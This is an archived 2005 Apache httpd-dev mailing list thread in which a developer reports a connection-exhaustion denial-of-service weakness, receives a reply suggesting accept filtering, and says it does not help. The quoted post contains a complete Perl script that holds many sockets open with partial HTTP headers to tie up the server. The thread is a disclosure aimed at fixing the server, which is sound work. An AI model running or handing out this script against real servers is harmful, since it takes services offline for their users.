httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Re: Timeout for requests
Date Tue, 03 May 2005 17:24:49 GMT
It doesn't.


Rasmus Lerdorf wrote:
> Turn on accept filtering and this problem goes away.  Or at least it
> moves to be a kernel-level issue instead of an Apache one.
> 
> -Rasmus
> 
> Ivan Barrera A. wrote:
> 
>> Hi...
>>
>>  I'm still fighting (probably for a lost cause.. but my boss ask me to
>> do this).
>>  In the socket activity there are some troubles dealing with timeouts.
>> It is pretty easy to Anyone DoS any apache webserver.
>>  I want to propose implementing a request timeout time, or at least a
>> check for incoming data.
>>
>>  If you open many sockets to an apache server, you can keep it alive,
>> and make apache keep it open for a looong time, eating resources. If you
>> limit the numbers of conecctions per ip, you still can DoS apache using
>> 2 or more other ips.
>>
>>  All this was tedtes with Timeout set to 20, KeepAlive set to 5, and all
>> relevant options to their lowest value.
>>
>>
>>  (one of the common scrips used to kill apache, is apache-squ1rt, i use
>> this other to test)
>>  Use this perl script to test :
>>
>> #!/usr/bin/perl
>>
>> my $Child = 150;
>> my $Sleep = 10;
>>
>> use IO::Socket;
>> use strict;
>>
>> my($c);
>> my(@SOCKET);
>> my($t);
>>
>> local $| = 1;
>>
>> $c=0;
>> for(0..$Child) {
>>   @SOCKET[$c] = new IO::Socket::INET( Proto   => "tcp",
>>                                             PeerAddr=> "127.0.0.1:80");
>>   $c++;
>> }
>>
>> for(0..$Child) {
>>   if ( defined @SOCKET[$c]) {
>>     $t = @SOCKET[$c];
>>     print $t "GET / HTTP/1.1";
>>   }
>> }
>>
>>
>> while(1){
>>   $c=0;
>>   # For each children
>>   for(0..$Child) {
>>     if ( defined @SOCKET[$c]) {
>>       $t = @SOCKET[$c];
>>       print $t "host: test.test";
>>     }
>>     $c++;
>>   }
>>   sleep ($Sleep);
>> }
>>
>> $c=0;
>> for(0..$Child) {
>>   close(@SOCKET[$c++]);
>> }
> 
> 
> 

Mime
View raw message